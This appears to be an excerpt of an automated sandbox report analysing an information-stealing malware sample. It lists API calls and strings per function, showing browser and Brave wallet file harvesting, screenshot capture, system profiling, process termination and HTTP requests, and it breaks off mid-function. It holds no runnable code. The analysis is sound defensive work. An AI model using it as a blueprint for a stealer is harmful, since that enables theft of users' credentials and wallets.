Instruction Fuzzy Hash: 7352F475910312AFEF1ADFA0FD188243BA7F718707F11A466E91582270E73B4A64EF19

Function 00414CC8 Relevance: 44.0, APIs: 21, Strings: 4, Instructions: 297
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00414D1C
FindFirstFileA.KERNEL32(?,?), ref: 00414D33
_memset.LIBCMT ref: 00414D4F
_memset.LIBCMT ref: 00414D60
StrCmpCA.SHLWAPI(?,004369F8), ref: 00414D81
StrCmpCA.SHLWAPI(?,004369FC), ref: 00414D9B
wsprintfA.USER32 ref: 00414DC2
StrCmpCA.SHLWAPI(?,0043660F), ref: 00414DD6
wsprintfA.USER32 ref: 00414DFF
wsprintfA.USER32 ref: 00414E16

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00412166: CreateFileA.KERNEL32(00414FAC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00414FAC,?), ref: 00412181

_memset.LIBCMT ref: 00414E28
lstrcatA.KERNEL32(?,?), ref: 00414E3D
strtok_s.MSVCRT ref: 00414E82
_memset.LIBCMT ref: 00414E94
lstrcatA.KERNEL32(?,?), ref: 00414EA9
strtok_s.MSVCRT ref: 00414EC2
PathMatchSpecA.SHLWAPI(?,00000000), ref: 00414ED7
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414FB6
strtok_s.MSVCRT ref: 00414FE7
FindNextFileA.KERNELBASE(?,?), ref: 00415105
FindClose.KERNEL32(?), ref: 00415125

Strings

%s\%s\%s, xrefs: 00414DF9
%s\%s, xrefs: 00414E10
%s\%s, xrefs: 00414DBC
%s\*.*, xrefs: 00414D10

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memsetlstrcatwsprintf$FileFindlstrcpystrtok_s$CloseCreateFirstMatchNextPathSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
API String ID: 2867719434-332874205
Opcode ID: 0bc5adfbe4236ef78a4ad54126e2e77cc3e862c7c695f1d91d4ab824e5d186cb
Instruction ID: 9fc36efd77a6d1cd63b80ec75f09b897df8326cc2b47f4e5761c6ba69d6b93d4
Opcode Fuzzy Hash: 0bc5adfbe4236ef78a4ad54126e2e77cc3e862c7c695f1d91d4ab824e5d186cb
Instruction Fuzzy Hash: 5BC12AB2E0021AABCF21EF61DC45AEE777DAF08305F0144A6F609B3151D7399B858F55

Function 0040884C Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 405
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410795: StrCmpCA.SHLWAPI(?,?,?,00408863,?,?,?), ref: 0041079E

CopyFileA.KERNEL32(?,?,00000001,004371C4,004367CF,?,?,?), ref: 00408941

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 004122B0: _memset.LIBCMT ref: 004122D7
Part of subcall function 004122B0: OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 0041237D
Part of subcall function 004122B0: TerminateProcess.KERNEL32(00000000,00000000), ref: 0041238B
Part of subcall function 004122B0: CloseHandle.KERNEL32(00000000), ref: 00412392

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408AA6
RtlAllocateHeap.NTDLL(00000000), ref: 00408AAD
StrCmpCA.SHLWAPI(?,ERROR_RUN_EXTRACTOR), ref: 00408B95
StrCmpCA.SHLWAPI(?,004371E8), ref: 00408BAB
StrCmpCA.SHLWAPI(?,004371EC), ref: 00408BD3
lstrlenA.KERNEL32(?), ref: 00408CF0
lstrlenA.KERNEL32(?), ref: 00408D0B

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

DeleteFileA.KERNEL32(?), ref: 00408D4E

Strings

ERROR_RUN_EXTRACTOR, xrefs: 00408B8F

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$Processlstrlen$FileHeaplstrcat$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait_memset
String ID: ERROR_RUN_EXTRACTOR
API String ID: 2819533921-2709115261
Opcode ID: 0b36c14b47e0fd9c7b7447fafa283bbeba69ea66fa84174adce9456e951a1997
Instruction ID: 65d458a2be874082b650ad6ccfc12f730853009eff9118d7dbcfdf0fd3eb137e
Opcode Fuzzy Hash: 0b36c14b47e0fd9c7b7447fafa283bbeba69ea66fa84174adce9456e951a1997
Instruction Fuzzy Hash: CAE14F71A00209AFCF01FFA1ED4A9DD7B76AF04309F10502AF541B71A1DB796E958F98

Function 00409D1C Relevance: 40.9, APIs: 18, Strings: 5, Instructions: 610
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,004367F2,004367EF,00437324,004367EE,?,?,?), ref: 00409DC6
StrCmpCA.SHLWAPI(?,00437328), ref: 00409DE7
StrCmpCA.SHLWAPI(?,0043732C), ref: 00409E01

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581

StrCmpCA.SHLWAPI(?,Opera GX,00437330,?,004367F3), ref: 00409E93
StrCmpCA.SHLWAPI(?,Brave,00437350,00437354,00437330,?,004367F3), ref: 0040A015
StrCmpCA.SHLWAPI(?,Preferences), ref: 0040A02F
StrCmpCA.SHLWAPI(?), ref: 0040A1FC
StrCmpCA.SHLWAPI(?), ref: 0040A266
StrCmpCA.SHLWAPI(0040CCE9), ref: 0040A279

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

StrCmpCA.SHLWAPI(?), ref: 0040A35C
CopyFileA.KERNEL32(?,?,00000001,0043738C,004367FB), ref: 0040A41C
StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0040A4C1
DeleteFileA.KERNEL32(?), ref: 0040A522

Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FD4
Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FEF

Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 00409970
Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 0040998B

StrCmpCA.SHLWAPI(?), ref: 0040A553
CopyFileA.KERNEL32(?,?,00000001,004373A0,00436802), ref: 0040A613
DeleteFileA.KERNEL32(?), ref: 0040A6AA

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

FindNextFileA.KERNEL32(?,?), ref: 0040A76E
FindClose.KERNEL32(?), ref: 0040A782

Strings

Google Chrome, xrefs: 0040A4B9
\BraveWallet\Preferences, xrefs: 0040A105
Preferences, xrefs: 0040A023
Brave, xrefs: 0040A00D
Opera GX, xrefs: 00409E8B

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Filelstrcpylstrlen$Find$CopyDeletelstrcat$CloseFirstNextSystemTime
String ID: Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
API String ID: 3650549319-1189830961
Opcode ID: 43b74e41b735a2950eaa9b795aa936c0c6a742f674b596ee9e9d83e77bc5aa89
Instruction ID: a20a882fd3e2cf19c19de5c34085d4fd9f009afcaba82f6ce1c70ae1e393a276
Opcode Fuzzy Hash: 43b74e41b735a2950eaa9b795aa936c0c6a742f674b596ee9e9d83e77bc5aa89
Instruction Fuzzy Hash: 7D422A3194012D9BCF21FB65DD46BCD7775AF04308F4101AAB848B31A2DB79AED98F89

Function 6C0835A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6C10F688,00001000), ref: 6C0835D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C0835E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6C0835FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C08363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C08369F
__aulldiv.LIBCMT ref: 6C0836E4
QueryPerformanceCounter.KERNEL32(?), ref: 6C083773
EnterCriticalSection.KERNEL32(6C10F688), ref: 6C08377E
LeaveCriticalSection.KERNEL32(6C10F688), ref: 6C0837BD
QueryPerformanceCounter.KERNEL32(?), ref: 6C0837C4
EnterCriticalSection.KERNEL32(6C10F688), ref: 6C0837CB
LeaveCriticalSection.KERNEL32(6C10F688), ref: 6C083801
__aulldiv.LIBCMT ref: 6C083883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C083902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C083918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C08394C

Strings

GTC, xrefs: 6C083912
QPC, xrefs: 6C0838FC
MOZ_TIMESTAMP_MODE, xrefs: 6C0835DB
AuthcAMDenti, xrefs: 6C083946
GenuntelineI, xrefs: 6C083639

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: ae6ccd180c233afe820b2dc5ce5765a8b152e892a1e73624c52a3bdb09548079
Instruction ID: b59a513112c40f8cad3988403defa25680fe7428336c0bf1aad7cb29e7778772
Opcode Fuzzy Hash: ae6ccd180c233afe820b2dc5ce5765a8b152e892a1e73624c52a3bdb09548079
Instruction Fuzzy Hash: CEB1B2B1B093009BDB08DF29C84571ABBF5BB8E704F048A2EE899D3390DF70D9459B95

Function 00415FD1 Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 205stringfileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00416018
FindFirstFileA.KERNEL32(?,?), ref: 0041602F
StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
wsprintfA.USER32 ref: 00416091
StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
wsprintfA.USER32 ref: 004160C2
wsprintfA.USER32 ref: 004160D9
PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
lstrcatA.KERNEL32(?), ref: 00416125
lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
lstrcatA.KERNEL32(?,?), ref: 0041614A
lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
lstrcatA.KERNEL32(?,?), ref: 00416170
FindNextFileA.KERNEL32(?,?), ref: 004162FF
FindClose.KERNEL32(?), ref: 00416313

Strings

%s\%s, xrefs: 0041608B
%s\*, xrefs: 0041600C
%s\%s, xrefs: 004160D3

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$wsprintf$Find$File$CloseFirstMatchNextPathSpec
String ID: %s\%s$%s\%s$%s\*
API String ID: 3541214880-445461498
Opcode ID: b86d1d5988e8a5b633457fbb9a5ee7423a29332bb6b218ad99de9aa99dd34375
Instruction ID: e3980370ac94f341e4db787ecefa849356652b5b9a50b55dc8137c0c02bcad1e
Opcode Fuzzy Hash: b86d1d5988e8a5b633457fbb9a5ee7423a29332bb6b218ad99de9aa99dd34375
Instruction Fuzzy Hash: FC81277190022DABCF60EF61CC45ACD77B9FB08305F0194EAE549A3150EE39AA898F94

Function 00411807 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 143memorycomtimeCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 0041180E
CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
VariantInit.OLEAUT32(?), ref: 004118DB

Part of subcall function 00411757: __EH_prolog3_catch.LIBCMT ref: 0041175E
Part of subcall function 00411757: CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF60,?,00000018,00411901,?), ref: 00411781
Part of subcall function 00411757: SysAllocString.OLEAUT32(?), ref: 0041178E
Part of subcall function 00411757: _wtoi64.MSVCRT ref: 004117C1
Part of subcall function 00411757: SysFreeString.OLEAUT32(?), ref: 004117DA
Part of subcall function 00411757: SysFreeString.OLEAUT32(00000000), ref: 004117E1

FileTimeToSystemTime.KERNEL32(?,?), ref: 0041190A
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00411916
HeapAlloc.KERNEL32(00000000), ref: 0041191D
VariantClear.OLEAUT32(?), ref: 0041195C
wsprintfA.USER32 ref: 00411949

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Strings

%d/%d/%d %d:%d:%d, xrefs: 00411943
Select * From Win32_OperatingSystem, xrefs: 00411895
InstallDate, xrefs: 004118ED
Unknown, xrefs: 0041196A
WQL, xrefs: 0041189A
ROOT\CIMV2, xrefs: 00411862
Unknown, xrefs: 00411985
Unknown, xrefs: 00411971

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileH_prolog3_catchH_prolog3_catch_InitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
API String ID: 2280294774-461178377
Opcode ID: fe6b9a04deeaae94ce61e149b8f4aed9b6b3574a86b373e3e1773863a37c8a56
Instruction ID: 9b83a2dca4a1b3c6c0afd6b9e082c19a49acb0dc1fc89349d09b2b61b6485616
Opcode Fuzzy Hash: fe6b9a04deeaae94ce61e149b8f4aed9b6b3574a86b373e3e1773863a37c8a56
Instruction Fuzzy Hash: F7418D71940209BBCB20CBD5DC89EEFBBBDEFC9B11F20411AF611A6190D7799941CB28

Function 00406963 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 161networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
StrCmpCA.SHLWAPI(?), ref: 004069DF
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
InternetReadFile.WININET(?,?,000007CF,?), ref: 00406B40
InternetCloseHandle.WININET(?), ref: 00406B50
InternetCloseHandle.WININET(?), ref: 00406B5C
InternetCloseHandle.WININET(?), ref: 00406B68

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Strings

GET, xrefs: 00406A42
ERROR, xrefs: 00406BAB
ERROR, xrefs: 00406AB6

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
String ID: ERROR$ERROR$GET
API String ID: 3863758870-2509457195
Opcode ID: f8bbef71df04f966e5d320ec9155bdde9ed9db18ec7c49dd597abc49b73d9854
Instruction ID: 58d07afc169a1ce0b47171bb7ce7cc0903f1f08f96176c9b1f2a19a3da15bd67
Opcode Fuzzy Hash: f8bbef71df04f966e5d320ec9155bdde9ed9db18ec7c49dd597abc49b73d9854
Instruction Fuzzy Hash: 9D51AEB1A00269AFDF20EB60DC84AEEB7B9FB04304F0181B6F549B2190DA755EC59F94

Function 00411F55 Relevance: 24.1, APIs: 16, Instructions: 147windowCOMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00411F96
GetDesktopWindow.USER32 ref: 00411FA4
GetWindowRect.USER32(00000000,?), ref: 00411FB1
GetDC.USER32(00000000), ref: 00411FB8
CreateCompatibleDC.GDI32(00000000), ref: 00411FC1
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00411FD1
SelectObject.GDI32(?,00000000), ref: 00411FDE
BitBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00411FFA
GetHGlobalFromStream.COMBASE(?,?), ref: 00412049
GlobalLock.KERNEL32(?), ref: 00412052
GlobalSize.KERNEL32(?), ref: 0041205E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00405482: lstrlenA.KERNEL32(?), ref: 00405519
Part of subcall function 00405482: StrCmpCA.SHLWAPI(?,00436986,0043697B,0043697A,0043696F), ref: 00405588
Part of subcall function 00405482: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA

SelectObject.GDI32(?,?), ref: 004120BC
DeleteObject.GDI32(?), ref: 004120D7
DeleteObject.GDI32(?), ref: 004120E0
ReleaseDC.USER32(00000000,00000000), ref: 004120E8
